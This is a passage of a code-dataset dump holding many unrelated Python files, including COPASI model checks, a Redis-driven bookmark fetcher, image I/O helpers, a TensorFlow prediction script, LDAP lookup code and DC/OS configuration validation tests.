os\n\nfrom sbpipe.utils.io import write_mat_on_file\n\nif sys.version_info > (3,):\n import importlib\n COPASI_loader = importlib.util.find_spec('COPASI')\n found = COPASI_loader is not None\nelse:\n import imp\n try:\n imp.find_module('COPASI')\n found = True\n except ImportError:\n found = False\n\nif found:\n import COPASI\n\n\nlogger = logging.getLogger('sbpipe')\n\n\ndef copasi_model_checking(model_filename, fileout, task_name=\"\"):\n \"\"\"\n Perform a basic model checking for a COPASI model file.\n\n :param model_filename: the filename to a COPASI file\n :param fileout: the file containing the model checking results\n :param task_name: the task to check\n :return: a boolean indicating whether the model could be loaded successfully\n \"\"\"\n\n try:\n data_model = COPASI.CCopasiRootContainer.addDatamodel()\n except:\n data_model = COPASI.CRootContainer.addDatamodel()\n\n # clear previous log messages\n COPASI.CCopasiMessage.clearDeque()\n\n outcome = []\n\n # list of checks\n if not check_model_loading(model_filename, data_model):\n outcome.append('model loading\\tERROR')\n write_mat_on_file(fileout, outcome)\n return False\n else:\n outcome.append('model loading\\tPASS')\n\n if not check_task_selection(model_filename, task_name, data_model):\n outcome.append('task selection\\tERROR')\n write_mat_on_file(fileout, outcome)\n return False\n else:\n outcome.append('task selection\\tPASS')\n\n write_mat_on_file(fileout, outcome)\n return True\n\n\ndef severity2string(severity):\n \"\"\"\n Return a string representing the severity of the error message\n :param severity: an integer representing severity\n :return: a string of the error message\n \"\"\"\n\n return {\n\n COPASI.CCopasiMessage.RAW: \"RAW\",\n COPASI.CCopasiMessage.TRACE: \"TRACE\",\n COPASI.CCopasiMessage.COMMANDLINE: \"COMMANDLINE\",\n COPASI.CCopasiMessage.WARNING: \"WARNING\",\n COPASI.CCopasiMessage.ERROR: \"ERROR\",\n COPASI.CCopasiMessage.EXCEPTION: \"EXCEPTION\",\n COPASI.CCopasiMessage.RAW_FILTERED: \"RAW_FILTERED\",\n COPASI.CCopasiMessage.TRACE_FILTERED: \"TRACE_FILTERED\",\n COPASI.CCopasiMessage.COMMANDLINE_FILTERED: \"COMMANDLINE_FILTERED\",\n COPASI.CCopasiMessage.WARNING_FILTERED: \"WARNING_FILTERED\",\n COPASI.CCopasiMessage.ERROR_FILTERED: \"ERROR_FILTERED\",\n COPASI.CCopasiMessage.EXCEPTION_FILTERED: \"EXCEPTION_FILTERED\"\n\n }.get(severity, COPASI.CCopasiMessage.RAW)\n\n\ndef check_model_loading(model_filename, data_model):\n \"\"\"\n Check whether the COPASI model can be loaded\n\n :param model_filename: the filename to a COPASI file\n :param data_model: the COPASI data model structure\n :return: a boolean indicating whether the model could be loaded successfully\n \"\"\"\n\n # check whether the model cannot be loaded\n if not data_model.loadModel(model_filename):\n logger.error('The model cannot be loaded into COPASI and has serious issues')\n logger.error(COPASI.CCopasiMessage.getAllMessageText())\n return False\n\n # the model could be loaded fine, but we could still print possible warnings\n if COPASI.CCopasiMessage.size() > 1:\n logger.warning('The highest error severity encountered was: {0}'.\n format(severity2string(COPASI.CCopasiMessage.getHighestSeverity())))\n logger.warning(COPASI.CCopasiMessage.getAllMessageText())\n else:\n logger.info('The model can be loaded without any apparent issues')\n\n return True\n\n\ndef check_task_selection(model_filename, task_name, data_model):\n \"\"\"\n Check whether the COPASI model task can be executed\n\n :param model_filename: the filename to a COPASI file\n :param task_name: the task to check\n :param data_model: the COPASI data model structure.\n :return: a boolean indicating whether the model task can be executed correctly\n \"\"\"\n\n # MODEL TASK\n if task_name:\n task = data_model.getTask(task_name)\n\n # check whether no task was selected\n if task is None:\n logger.error('No task with name `{0}` was found'.format(task_name))\n return False\n\n # check whether the task is scheduled, otherwise it will not run from CopasiSE\n logger.debug('Task `{0}` is {1}'.format(task_name,\n \"scheduled\" if task.isScheduled() else \"not scheduled\"))\n\n # check whether the task cannot be initialized\n if not task.initialize(COPASI.CCopasiTask.OUTPUT_UI):\n logger.error('COPASI task `{0}` cannot be initialised'.format(task_name))\n task.process(True)\n logger.error(task.getProcessError())\n return False\n\n if not check_task_report(model_filename, task_name, data_model, task):\n return False\n\n return True\n\n\ndef check_task_report(model_filename, task_name, data_model, task):\n \"\"\"\n Check whether the COPASI model task can be executed\n\n :param model_filename: the filename to a COPASI file\n :param task_name: the task to check\n :param data_model: the COPASI data model structure\n :param task: the COPASI task data structure\n :return: a boolean indicating whether the model task can be executed correctly\n \"\"\"\n\n report_filename = task.getReport().getTarget()\n\n # check whether a report was not configured\n if not report_filename:\n logger.error('No report was configured for COPASI task `{0}`'.format(task_name))\n return False\n\n # check whether the report name is different from the model name\n model_name = os.path.splitext(os.path.basename(model_filename))[0]\n report_name = os.path.splitext(os.path.basename(report_filename))[0]\n report_ext = os.path.splitext(os.path.basename(report_filename))[1]\n change_report_name = False\n change_report_ext = False\n if model_name != report_name:\n logger.warning('The report filename differs from the model name.')\n report_name = model_name\n change_report_name = True\n if report_ext not in {'.csv', '.txt', '.tsv', '.dat'}:\n logger.warning('The report extension must be one of the following: .csv, .txt, .tsv, or .dat')\n report_ext = '.csv'\n change_report_ext = True\n if change_report_name or change_report_ext:\n logger.warning('SBpipe will update the report file name to `{0}{1}`'.format(report_name, report_ext))\n task.getReport().setTarget(report_name + report_ext)\n task.getReport().setAppend(False)\n # save the model to a COPASI file\n data_model.saveModel(model_filename, True)\n\n # dunno why this is generated.. it seems a bug in Copasi to me..\n fake_report = os.path.join(os.path.dirname(model_filename), report_filename)\n if os.path.exists(fake_report):\n os.remove(fake_report)\n\n logger.info('COPASI task `{0}` can be executed'.format(task_name))\n\n return True\n\n","sub_path":"sbpipe/simul/copasi/model_checking.py","file_name":"model_checking.py","file_ext":"py","file_size_in_byte":8146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647506784","text":"import urllib2\nfrom urlparse import urljoin\nfrom BeautifulSoup import BeautifulSoup\nfrom redis import Redis\nimport json\nimport threading\n\nimport settings\nfrom models import Link\n\n\nclass RedisSubcriber(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.redis = Redis(host=settings.REDIS_HOST, port=settings.REDIS_PORT, db=settings.REDIS_DB_NO)\n self.pubsub = self.redis.pubsub()\n self.pubsub.subscribe(settings.REDIS_QUEUE_NAME)\n\n def run(self):\n for item in self.pubsub.listen():\n if item['channel'] == settings.REDIS_QUEUE_NAME and item['type'] == 'message':\n self.on_message(item['data'])\n\n def on_message(self, data):\n try:\n obj = json.loads(data)\n fetch_page(obj['link_id'])\n except:\n pass\n\n\ndef fetch_page(link_id):\n link = Link.objects.get(pk=link_id)\n url = link.url\n\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}\n req = urllib2.Request(url, None, headers)\n\n try:\n html = urllib2.urlopen(req).read()\n soup = BeautifulSoup(html)\n link.title = soup.find('title').text\n\n favicon = soup.find('link', rel='shortcut icon')\n if favicon and favicon['href']:\n link.favicon = urljoin(url, favicon['href'])\n\n for item in soup.findAll('meta'):\n if item.get('name', '').lower() in ('description', 'og:description') and item.get('content', ''):\n link.description = item.get('content', '')\n\n except Exception as e:\n link.is_error = 1\n link.error_text = e.reason.__str__()\n\n link.save()\n","sub_path":"BookmarkService/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"375768808","text":"import pandas as pd\nimport numpy as np\n\n\nclass SimilarityIndex():\n\n def __init__(self):\n self.similarity_df = None\n\n def calculate_similarity_between(self, mass_spectrum1, mass_spectrum2):\n nominator = np.sum(np.dot(mass_spectrum1, mass_spectrum2))\n ms1_sq, ms2_sq = np.dot(mass_spectrum1, mass_spectrum1), np.dot(mass_spectrum2, mass_spectrum2)\n denominator = np.sqrt(np.sum(ms1_sq) * np.sum(ms2_sq))\n return nominator/denominator\n\n def create_similarity_data_frame(self, columns, data_point_dict, ref_spectra):\n similarity_df = pd.DataFrame(columns=columns)\n function = self.calculate_similarity_between\n for k, v in data_point_dict.items():\n for item in ref_spectra:\n similarity_df.loc[k] = [function(v, ref_spectrum) for ref_spectrum in ref_spectra]\n self.similarity_df = similarity_df\n return similarity_df\n","sub_path":"mstools/metrics/SimilarityIndex.py","file_name":"SimilarityIndex.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"386225128","text":"from numpy import genfromtxt\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\ndef find_best():\n results = []\n best = 0\n for k in range(1, 10):\n for p in range(1, 3):\n neigh = KNeighborsClassifier(n_neighbors=k, p=p)\n neigh.fit(train_x, train_y)\n pred = neigh.predict(test_x)\n # without using sklearn.metrics.accuracy_score\n count = 0\n for j in range(pred.size):\n if pred[j] == test_y[j]:\n count += 1\n if count > best:\n best = count\n results.append((k, p, count))\n print(results)\n print(\"Finding best configurations of k and p for\", test_x_name)\n for i in range(len(results)):\n if results[i][2] == best:\n print(\"k =\", results[i][0], \"and p =\", results[i][1])\n return results\n\n\nfor i in range(1, 4):\n if i == 1:\n train_x_name = '../data/data_x_tr.csv'\n train_y_name = '../data/data_y_tr.csv'\n test_x_name = '../data/data_x_tst.csv'\n test_y_name = '../data/data_y_tst.csv'\n else:\n train_x_name = '../data/data' + str(i) + '_x_tr.csv'\n train_y_name = '../data/data' + str(i) + '_y_tr.csv'\n test_x_name = '../data/data' + str(i) + '_x_tst.csv'\n test_y_name = '../data/data' + str(i) + '_y_tst.csv'\n train_x = genfromtxt(train_x_name, delimiter=',')\n train_y = genfromtxt(train_y_name, delimiter=',')\n test_x = genfromtxt(test_x_name, delimiter=',')\n test_y = genfromtxt(test_y_name, delimiter=',')\n find_best()\n","sub_path":"HW2/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"49161914","text":"# Author: Stephen Timmel\n# stimmel@vt.edu\n# Not for external distribution.\n\n#internal image layout: img[row][column][rgb]\n#sample usage: img[5][5]['r']\n\nimport struct\n\ndef save_ppm_image_8(filename,img):\n f = open(filename,'w');\n\n #write ppm header\n width = len(img[0])\n height = len(img)\n f.write('P6 ' + str(width) + ' ' + str(height) + ' ' + '255' + '\\n')\n\n for row in img:\n for pixel in row:\n red = struct.pack('@B',pixel['r'])\n green = struct.pack('@B',pixel['g'])\n blue = struct.pack('@B',pixel['b'])\n f.write(red + green + blue)\n f.close()\n\ndef load_ppm_image_8(filename):\n f = open(filename,'rb');\n\n #read ppm header\n header = f.readline().replace('\\n','').split(' ')\n\n #validate header\n assert len(header) == 4, \"Incorrect PPM8 header length\" \n assert header[0] == 'P6', \"Incorrect PPM8 file format. Must be P6\" \n assert header[1].isdigit(), \"Incorrect PPM8 width. Must be numeric\" \n assert header[2].isdigit(), \"Incorrect PPM8 height. Must be numeric\" \n assert header[3].isdigit(), \"Incorrect PPM8 color depth. Must be numeric\"\n assert header[3] == '255', \"Incorrect PPM8 color depth. Must be 255\"\n\n #save width and height for later\n width = int(header[1])\n height = int(header[2])\n \n #pull file into an array, three bytes at a time\n img = []\n for h in range(height):\n img.append([])\n for w in range(width):\n img[h].append({})\n data = f.read(3)\n img[h][w]['r'] = int(struct.unpack_from('@B',data,0)[0])\n img[h][w]['g'] = int(struct.unpack_from('@B',data,1)[0])\n img[h][w]['b'] = int(struct.unpack_from('@B',data,2)[0])\n\n f.close()\n return img\n\ndef save_pgm_image_8(filename,img):\n f = open(filename,'w');\n\n #write ppm header\n width = len(img[0])\n height = len(img)\n f.write('P5 ' + str(width) + ' ' + str(height) + ' ' + '255' + '\\n')\n\n for row in img:\n for pixel in row:\n shade = struct.pack('@B',pixel)\n f.write(shade)\n f.close()\n\ndef load_pgm_image_8(filename):\n f = open(filename,'rb');\n\n #read ppm header\n header = f.readline().replace('\\n','').split(' ')\n\n #validate header\n assert len(header) == 4, \"Incorrect PGM8 header length\" \n assert header[0] == 'P5', \"Incorrect PGM8 file format. Must be P5\" \n assert header[1].isdigit(), \"Incorrect PGM8 width. Must be numeric\" \n assert header[2].isdigit(), \"Incorrect PGM8 height. Must be numeric\" \n assert header[3].isdigit(), \"Incorrect PGM8 color depth. Must be numeric\"\n assert header[3] == '255', \"Incorrect PGM8 color depth. Must be 255\"\n\n #save width and height for later\n width = int(header[1])\n height = int(header[2])\n \n #pull file into an array, three bytes at a time\n img = []\n for h in range(height):\n img.append([])\n for w in range(width):\n data = f.read(1)\n img[h].append(int(struct.unpack('@B',data)[0]))\n\n f.close()\n return img\n","sub_path":"projects/proj01/code/scripts/pam_io.py","file_name":"pam_io.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70319142","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\n\"\"\"\nPrect the model described in:\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport inspect,codecs,sys,os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nbase_path = os.path.dirname(__file__);\nsys.path.append(os.path.join(base_path,'.'));\n\nfrom djl_model_lstm import PTBInput\nfrom djl_model_lstm import PTBModel\nfrom config import get_prect_config as config\nimport djl_reader as reader\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\n \"model\", \"small\",\n \"A type of model. Possible options are: small, medium, large.\")\n\nflags.DEFINE_string(\"vocab_path\", None,\n \"Where the vocab data is stored.\")\n\nflags.DEFINE_string(\"test_path\", None,\n \"Where the test data is stored.\")\nflags.DEFINE_string(\"save_path\", None,\n \"Model output directory.\")\nflags.DEFINE_bool(\"use_fp16\", False,\n \"Train using 16-bit floats instead of 32bit floats\")\n\nFLAGS = flags.FLAGS\n\n\nsys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout)\ndef data_type():\n\treturn tf.float16 if FLAGS.use_fp16 else tf.float32\n\ndef run_epoch(session, model,id_to_word = None, eval_op=None, verbose=False):\n\t\"\"\"Runs the model on the given data.\"\"\"\n\tstart_time = time.time()\n\tcosts = 0.0\n\titers = 0\n\tstate = session.run(model.initial_state)\n\n\tfetches = {\n\t\t\"softmax_w\": model.softmax_w,\n\t\t\"output\": model.output,\n\t\t\"logits\": model.logits,\n\t\t\"targets\": model.targets,\n\t\t\"input\": model.input.input_data,\n\t\t\"cost\": model.cost,\n\t\t\"final_state\": model.final_state,\n\t}\n\tif eval_op is not None: fetches[\"eval_op\"] = eval_op\n\n\tfp = codecs.open(FLAGS.test_path + '.pret','w','utf8');\n\tfor step in range(model.input.epoch_size):\n\t\tfeed_dict = {}\n\t\tfor i, (c, h) in enumerate(model.initial_state):\n\t\t\tfeed_dict[c] = state[i].c\n\t\t\tfeed_dict[h] = state[i].h\n\n\t\tvals = session.run(fetches, feed_dict)\n\t\tcost = vals[\"cost\"]\n\t\tstate = vals[\"final_state\"]\n\t\tinput = [id_to_word[x] for x in vals[\"input\"].reshape(-1)];\n\t\ttargets = [id_to_word[x] for x in vals[\"targets\"].reshape(-1)];\n\t\tprint('loginfo:-----------------------------')\n\t\tprint('input:' + ' '.join(input))\n\t\tprint('target:' + ' '.join(targets))\n#\t\tprint('output:',vals['output'])\n#\t\tprint('prect:',np.fabs(vals['logits']))\n\t\tprint('cost:',cost);\n\t\tcosts += cost\n\t\titers += model.input.num_steps\n\t\tif verbose == False and not id_to_word is None:\n\t\t\twid = vals[\"input\"][0][0];\n\t\t\tmaxids = vals[\"logits\"].argmax(axis = 1);\n\t\t\tprint('input:',wid,id_to_word[wid],' prect:',maxids[0],id_to_word[maxids[0]])\n\t\t\tfp.write(id_to_word[wid] + id_to_word[maxids[0]]);\n\t\t\tif iters % 20 == 0:\n\t\t\t\tfp.write('\\n');\n\tfp.close();\n\treturn np.exp(costs / iters)\n\ndef main(_):\n\tif not FLAGS.test_path:\n\t\traise ValueError(\"Must set --test_path to PTB data directory\")\n\n\tif not FLAGS.vocab_path:\n\t\traise ValueError(\"Must set --vocab_path to PTB data directory\")\n\n\traw_data = reader.djl_raw_data(FLAGS.vocab_path,FLAGS.test_path)\n\ttest_data, test_tag,word_to_id,id_to_word = raw_data\n\n\twith tf.name_scope(\"Test\"):\n\t\ttest_input = PTBInput(config=config, idata=test_data, tdata=test_tag, name=\"TestInput\")\n\t\twith tf.variable_scope(\"Model\"):\n\t\t\tmtest = PTBModel(is_training=False, config=config,input_=test_input)\n\n\tsv = tf.train.Supervisor(logdir=FLAGS.save_path)\n\twith sv.managed_session() as session:\n\t\tif FLAGS.save_path:\n\t\t\tmodel_path = tf.train.latest_checkpoint(FLAGS.save_path);\n\t\t\tprint(model_path);\n\t\t\tload_path = sv.saver.restore(session,model_path);\n\n\t\ttest_perplexity = run_epoch(session, mtest,id_to_word= id_to_word)\n\t\tprint(\"Test Perplexity: %.3f\" % test_perplexity)\n\nif __name__ == \"__main__\":\n\ttf.app.run()\n","sub_path":"script/djl_model_prect.py","file_name":"djl_model_prect.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"349627024","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests using pytest_resilient_circuits\"\"\"\n\nimport pytest\nfrom mock import patch\nfrom resilient_circuits.util import get_config_data, get_function_definition\nfrom resilient_circuits import SubmitTestFunction, FunctionResult\nfrom .mock_artifacts import mocked_aws_lambda\n\nPACKAGE_NAME = \"fn_aws_utilities\"\nFUNCTION_NAME = \"fn_invoke_lambda\"\n\n# Read the default configuration-data section from the package\nconfig_data = get_config_data(PACKAGE_NAME)\n\n# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)\nresilient_mock = \"pytest_resilient_circuits.BasicResilientMock\"\n\n\ndef call_fn_invoke_lambda_function(circuits, function_params, timeout=5):\n # Create the submitTestFunction event\n evt = SubmitTestFunction(\"fn_invoke_lambda\", function_params)\n\n # Fire a message to the function\n circuits.manager.fire(evt)\n\n # circuits will fire an \"exception\" event if an exception is raised in the FunctionComponent\n # return this exception if it is raised\n exception_event = circuits.watcher.wait(\"exception\", parent=evt, timeout=timeout)\n\n if exception_event is not False:\n exception = exception_event.args[1]\n raise exception\n\n # else return the FunctionComponent's results\n else:\n event = circuits.watcher.wait(\"fn_invoke_lambda_result\", parent=evt, timeout=timeout)\n assert event\n assert isinstance(event.kwargs[\"result\"], FunctionResult)\n pytest.wait_for(event, \"complete\", True)\n return event.kwargs[\"result\"].value\n\n\nclass TestFnInvokeLambda:\n \"\"\" Tests for the fn_invoke_lambda function\"\"\"\n\n def test_function_definition(self):\n \"\"\" Test that the package provides customization_data that defines the function \"\"\"\n func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)\n assert func is not None\n\n # test if handles sum two ints\n mock_inputs_1 = {\n \"lambda_payload\": {\"x\": 1, \"y\": 2},\n \"lambda_function_name\": \"two_int_sum\"\n }\n\n expected_results_1 = '3'\n\n # test if handles strings the same as ints\n mock_inputs_2 = {\n \"lambda_payload\": {\"x\": \"1\", \"y\": \"2\"},\n \"lambda_function_name\": \"two_int_sum\"\n }\n\n expected_results_2 = '3'\n\n mock_inputs_3 = {\n \"lambda_payload\": {\"str1\": \"two\", \"str2\": \"words\"},\n \"lambda_function_name\": \"concat_strings\"\n }\n\n expected_results_3 = \"twowords\"\n\n @patch(\"fn_aws_utilities.components.fn_invoke_lambda.AWSLambda\", side_effect=mocked_aws_lambda)\n @pytest.mark.parametrize(\"mock_inputs, expected_results\", [\n (mock_inputs_1, expected_results_1),\n (mock_inputs_2, expected_results_2),\n (mock_inputs_3, expected_results_3)\n ])\n def test_success(self, mock_aws_lambda, circuits_app, mock_inputs, expected_results):\n \"\"\" Test calling with sample values for the parameters \"\"\"\n\n results = call_fn_invoke_lambda_function(circuits_app, mock_inputs).get(\"response_payload\")\n assert(expected_results == results)\n","sub_path":"fn_aws_utilities/tests/test_funct_fn_invoke_lambda.py","file_name":"test_funct_fn_invoke_lambda.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"418069189","text":"from django.contrib import admin\nfrom dc_app.models import Major,Credential,News\nfrom dc_app.userprofile import Profile\nfrom django.contrib.auth.models import User \n# Register your models here.\n'''\n内容管理系统\n'''\nclass MajorAdmin(admin.ModelAdmin):\n\tlist_display = ('m_name',)\n\nclass CredentialAdmin(admin.ModelAdmin):\n\tlist_display = ('c_name','time','search','grade','classes','question')#\n\nclass NewsAdmin(admin.ModelAdmin):\n\tlist_display = ('title','editor')\n\nclass ProfileUnline(admin.TabularInline):\n\tmodel = Profile\n\tverbose_name = '信息'\n\nclass UserAdmin(admin.ModelAdmin):\n\tinlines = (ProfileUnline,)\n\n\nadmin.site.unregister(User)\nadmin.site.register(User,UserAdmin)\nadmin.site.register(Major,MajorAdmin)\nadmin.site.register(Credential,CredentialAdmin)\nadmin.site.register(News,NewsAdmin)\n","sub_path":"dc_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158440903","text":"import numpy as np\n\nimport pytest\n\nfrom sklego.neighbors import BayesianKernelDensityClassifier\nfrom sklego.common import flatten\nfrom sklego.testing import check_shape_remains_same_classifier\nfrom tests.conftest import nonmeta_checks, general_checks, estimator_checks\n\n\n@pytest.fixture()\ndef simple_dataset():\n # Two linearly separable mvn should have a 100% prediction accuracy\n x = np.concatenate(\n [np.random.normal(-10, 1, (100, 2)), np.random.normal(10, 1, (100, 2))]\n )\n y = np.concatenate([np.zeros(100), np.ones(100)])\n return x, y\n\n\n@pytest.mark.parametrize(\n \"test_fn\",\n flatten(\n [\n nonmeta_checks,\n general_checks,\n estimator_checks.check_classifier_data_not_an_array,\n estimator_checks.check_classifiers_one_label,\n estimator_checks.check_classifiers_classes,\n estimator_checks.check_classifiers_train,\n estimator_checks.check_supervised_y_2d,\n estimator_checks.check_supervised_y_no_nan,\n estimator_checks.check_estimators_unfitted,\n check_shape_remains_same_classifier,\n ]\n ),\n)\ndef test_estimator_checks(test_fn):\n test_fn(BayesianKernelDensityClassifier.__name__, BayesianKernelDensityClassifier())\n\n\ndef test_trivial_classification(simple_dataset):\n x, y = simple_dataset\n model = BayesianKernelDensityClassifier().fit(x, y)\n assert (model.predict(x) == y).all()\n","sub_path":"tests/test_estimators/test_neighbor_classifier.py","file_name":"test_neighbor_classifier.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"298654024","text":"from modules import settings\nfrom ldap3 import Server, Connection, ALL, NTLM, ALL_ATTRIBUTES\n\n\ndef ldapSetUp():\n if settings.ldap[\"ldapAvailable\"] is True:\n try:\n directoryServer = Server(settings.ldap[\"ldapServer\"], get_info=ALL, use_ssl=True)\n ldapConnection = Connection(directoryServer, auto_bind=True,\n user=settings.ldap[\"ldapAccessDomain\"] + \"\\\\\" + settings.ldap[\"ldapAccessUserName\"],\n password=settings.ldap[\"ldapAccessPassword\"],\n authentication=NTLM, client_strategy=RESTARTABLE)\n return True, ldapConnection\n except Exception as e:\n print(e)\n print(\"Can't connect to your Active Directory domain! Check your configuration.\")\n return False, None\n else:\n # According to settings.yaml, they didn't want AD anyway.\n return False, None\ndef getStudentName(id):\n searchName = \"s\" + str(id) # adds s so you can search AD by student number...\n ldapConnection.search(settings.ldap[\"ldapSearchBase\"], '(sAMAccountName=' + searchName + ')',\n attributes=ALL_ATTRIBUTES)\n ldapQueryResult = ldapConnection.entries[0] # there shouldn't be more than one entry anyway\n return ldapQueryResult.givenname.value + \" \" + ldapQueryResult.sn.value # first and last name\n\nldapAvailable, ldapConnection = ldapSetUp()","sub_path":"modules/ldapConnect.py","file_name":"ldapConnect.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"433525461","text":"import json\nfrom kombi.Task import Task\n\nclass VendorData(Task):\n \"\"\"\n Implements a task that writes a json file.\n \"\"\"\n\n def _perform(self):\n \"\"\"\n Implement the execution of the task.\n \"\"\"\n crawler = self.crawlers()[0]\n targetFilePath = self.target(crawler)\n\n data = {\n \"vendorVersion\": crawler.var('vendorVersion'),\n \"plateName\": crawler.var('plateName')\n }\n\n with open(targetFilePath, 'w') as f:\n json.dump(data, f)\n\n return super(VendorData, self)._perform()\n\n\n# registering task\nTask.register(\n 'vendorData',\n VendorData\n)\n","sub_path":"data/examples/vendorXPlatesInlineCrawlers/Tasks/VendorData.py","file_name":"VendorData.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"332623020","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Project Templates Module.\"\"\"\n\n\nfrom micropy.project.modules import ProjectModule\nfrom micropy.project.template import TemplateProvider\n\n\nclass TemplatesModule(ProjectModule):\n \"\"\"Project Templates Module.\n\n Generates and manages project files using the Projects\n context.\n\n Args:\n templates (List[str]): List of templates to use.\n run_checks (bool, optional): Whether to execute checks or not.\n Defaults to True.\n\n \"\"\"\n PRIORITY: int = 0\n TEMPLATES = TemplateProvider.TEMPLATES\n\n def __init__(self, templates=None, run_checks=True, **kwargs):\n self.templates = templates or []\n super().__init__(**kwargs)\n self.run_checks = run_checks\n self.enabled = {\n 'vscode': False,\n 'pylint': False\n }\n if templates:\n for key in self.enabled:\n if key in self.templates:\n self.enabled[key] = True\n self.provider = TemplateProvider(\n self.templates, **kwargs)\n\n @property\n def config(self):\n \"\"\"Template config.\n\n Returns:\n dict: Current configuration\n\n \"\"\"\n _config = self.parent.config.get('config', {})\n self.enabled = {**self.enabled, **_config}\n return {\n 'config': self.enabled\n }\n\n def load(self, **kwargs):\n \"\"\"Loads project templates.\"\"\"\n _data = self.config.get('config')\n self.enabled = {**self.enabled, **_data}\n templates = [k for k, v in self.enabled.items() if v]\n self.log.debug(f\"Loading Templates: {templates}\")\n self.provider = TemplateProvider(templates, **kwargs)\n self.update()\n\n def create(self):\n \"\"\"Generates project files.\n\n Returns:\n dict: Project context\n\n \"\"\"\n self.log.title(\"Rendering Templates\")\n self.log.info(\"Populating Stub Info...\")\n for t in self.provider.templates:\n self.provider.render_to(t, self.parent.path, **self.parent.context.raw)\n self.log.success(\"Stubs Injected!\")\n return self.parent.context\n\n def update(self):\n \"\"\"Updates project files.\n\n Returns:\n dict: Project context\n\n \"\"\"\n for tmp in self.provider.templates:\n self.provider.update(tmp, self.parent.path, **self.parent.context.raw)\n return self.parent.context\n","sub_path":"micropy/project/modules/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211597182","text":"import copy\n\nimport pkg_resources\nimport pytest\n\nimport gen\n\n\ntrue_false_msg = \"Must be one of 'true', 'false'. Got 'foo'.\"\n\n\ndef validate_helper(arguments):\n return gen.validate(arguments=arguments)\n\n\n@pytest.fixture\ndef default_arguments():\n return copy.deepcopy({\n 'ip_detect_filename': pkg_resources.resource_filename('gen', 'ip-detect/aws.sh'),\n 'bootstrap_id': '123',\n 'exhibitor_zk_path': '/dcos',\n 'master_discovery': 'static',\n 'provider': 'onprem',\n 'exhibitor_zk_hosts': '52.37.205.237:2181',\n 'resolvers': '[\"8.8.8.8\", \"8.8.4.4\"]',\n 'master_list': '[\"52.37.192.49\", \"52.37.181.230\", \"52.37.163.105\"]',\n 'exhibitor_storage_backend': 'zookeeper',\n 'bootstrap_url': 'file:///opt/dcos_install_tmp',\n 'cluster_name': 'Mesosphere: The Data Center Operating System',\n 'bootstrap_variant': '',\n 'oauth_available': 'true',\n 'oauth_enabled': 'true'})\n\n\ndef validate_error(new_arguments, key, message):\n arguments = default_arguments()\n arguments.update(new_arguments)\n expected = {\n 'status': 'errors',\n 'errors': {\n key: {\n 'message': message\n }\n },\n 'unset': set(),\n }\n validated = validate_helper(arguments)\n assert validated['status'] == 'errors'\n assert validated == expected\n\n\ndef test_invalid_telemetry_enabled():\n err_msg = \"Must be one of 'true', 'false'. Got 'foo'.\"\n validate_error(\n {'telemetry_enabled': 'foo'},\n 'telemetry_enabled',\n err_msg)\n\n\ndef test_invalid_ports():\n test_bad_range = '[\"52.37.192.49\", \"52.37.181.230:53\", \"52.37.163.105:65536\"]'\n range_err_msg = \"Must be between 1 and 65535 inclusive\"\n test_bad_value = '[\"52.37.192.49\", \"52.37.181.230:53\", \"52.37.163.105:abc\"]'\n value_err_msg = \"Must be an integer but got a str: abc\"\n\n validate_error(\n {'resolvers': test_bad_range},\n 'resolvers',\n range_err_msg)\n\n validate_error(\n {'resolvers': test_bad_value},\n 'resolvers',\n value_err_msg)\n\n\ndef test_invalid_ipv4():\n test_ips = '[\"52.37.192.49\", \"52.37.181.230\", \"foo\", \"52.37.163.105\", \"bar\"]'\n err_msg = \"Invalid IPv4 addresses in list: foo, bar\"\n validate_error(\n {'master_list': test_ips},\n 'master_list',\n err_msg)\n\n validate_error(\n {'resolvers': test_ips},\n 'resolvers',\n err_msg)\n\n\ndef test_invalid_zk_path():\n validate_error(\n {'exhibitor_zk_path': 'bad/path'},\n 'exhibitor_zk_path',\n \"Must be of the form /path/to/znode\")\n\n\ndef test_invalid_zk_hosts():\n validate_error(\n {'exhibitor_zk_hosts': 'zk://10.10.10.10:8181'},\n 'exhibitor_zk_hosts',\n \"Must be of the form `host:port,host:port', not start with zk://\")\n\n\ndef 